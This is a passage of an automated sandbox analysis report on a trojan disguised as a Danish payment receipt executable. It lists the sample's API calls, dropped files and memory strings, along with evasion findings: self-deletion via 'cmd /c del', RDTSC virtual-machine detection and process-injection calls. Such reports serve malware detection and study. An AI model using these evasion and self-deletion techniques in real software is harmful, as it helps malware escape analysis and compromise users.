          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C5A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C5A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C5A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C5B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C59520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C5AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002B6550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,
          Source: Betalingskvittering.exe, 00000000.00000003.349666063.000000000F166000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Betalingskvittering.exe
          Source: Betalingskvittering.exe, 00000001.00000002.409576361.000000000263D000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs Betalingskvittering.exe
          Source: Betalingskvittering.exe, 00000001.00000002.409380845.0000000000BEF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Betalingskvittering.exe
          Source: Betalingskvittering.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: C:\Users\user\Desktop\Betalingskvittering.exeFile read: C:\Users\user\Desktop\Betalingskvittering.exeJump to behavior
          Source: Betalingskvittering.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Betalingskvittering.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Betalingskvittering.exe 'C:\Users\user\Desktop\Betalingskvittering.exe'
          Source: C:\Users\user\Desktop\Betalingskvittering.exeProcess created: C:\Users\user\Desktop\Betalingskvittering.exe 'C:\Users\user\Desktop\Betalingskvittering.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Betalingskvittering.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Betalingskvittering.exeProcess created: C:\Users\user\Desktop\Betalingskvittering.exe 'C:\Users\user\Desktop\Betalingskvittering.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Betalingskvittering.exe'
          Source: C:\Users\user\Desktop\Betalingskvittering.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\Betalingskvittering.exeFile created: C:\Users\user\AppData\Local\Temp\nsjE503.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@13/9
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,GetEncryptedFileVersionExt,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002AC5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,
          Source: Betalingskvittering.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: wntdll.pdbUGP source: Betalingskvittering.exe, 00000000.00000003.352403148.000000000F050000.00000004.00000001.sdmp, Betalingskvittering.exe, 00000001.00000002.408971728.0000000000940000.00000040.00000001.sdmp, cmd.exe, 00000007.00000002.613167685.0000000002BF0000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: Betalingskvittering.exe, 00000001.00000002.409540986.00000000025F0000.00000040.00020000.sdmp, cmd.exe, 00000007.00000000.408444946.00000000002A0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: Betalingskvittering.exe, cmd.exe
          Source: Binary string: cmd.pdb source: Betalingskvittering.exe, 00000001.00000002.409540986.00000000025F0000.00000040.00020000.sdmp, cmd.exe
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0041B8B6 push 10745811h; ret
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0041B93B push 10745811h; ret
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0041BA2C push 10745811h; ret
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0040C2BC push esp; iretd
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0041BD2B push 10745811h; ret
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00403632 push FFFFFF8Dh; ret
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0041B7C5 push eax; ret
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00417FF6 push ecx; ret
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009BD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002B76BD push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002B76D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_02C6D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\Betalingskvittering.exeFile created: C:\Users\user\AppData\Local\Temp\nspE572.tmp\nkcyodylqw.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: /c del 'C:\Users\user\Desktop\Betalingskvittering.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: /c del 'C:\Users\user\Desktop\Betalingskvittering.exe'
          Source: C:\Users\user\Desktop\Betalingskvittering.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Betalingskvittering.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Betalingskvittering.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 0000000000248604 second address: 000000000024860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 000000000024898E second address: 0000000000248994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 5416Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe TID: 7116Thread sleep time: -46000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\Betalingskvittering.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002B245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002B68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002AB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002A85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002C31DC FindFirstFileW,FindNextFileW,FindClose,
          Source: explorer.exe, 00000004.00000000.363062588.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.376258618.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000004.00000000.359385804.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.376258618.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000004.00000000.394004041.00000000082E2000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000004.00000000.359385804.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.394004041.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000000.371391348.000000000461E000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000004.00000000.394004041.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000004.00000000.363062588.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000004.00000000.388648434.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 7_2_002C2258 IsDebuggerPresent,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_73653070 sfynbu,GetProcessHeap,RtlAllocateHeap,memset,VirtualProtect,
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\Betalingskvittering.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_736554DA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_7365581C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_736556EE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_736557DE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 0_2_7365579F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00969080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009FB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009FB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A34015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0097B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0097B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0097B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0097B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00980050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00980050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A22073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A31074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00992990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0098C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009E69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009961A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0096B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0096B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0096B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009F41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00969100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00969100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00969100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00984120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00984120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00984120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00984120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00984120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0098B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0098B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0096B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0096B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0096C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0097AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0097AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0099FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00992ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00992AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0096AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_0096AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00983A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00965210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00965210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00965210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00965210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00978A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A2AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_009A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Betalingskvittering.exeCode function: 1_2_00A1B260 mov eax, dword ptr fs:[00000030h]
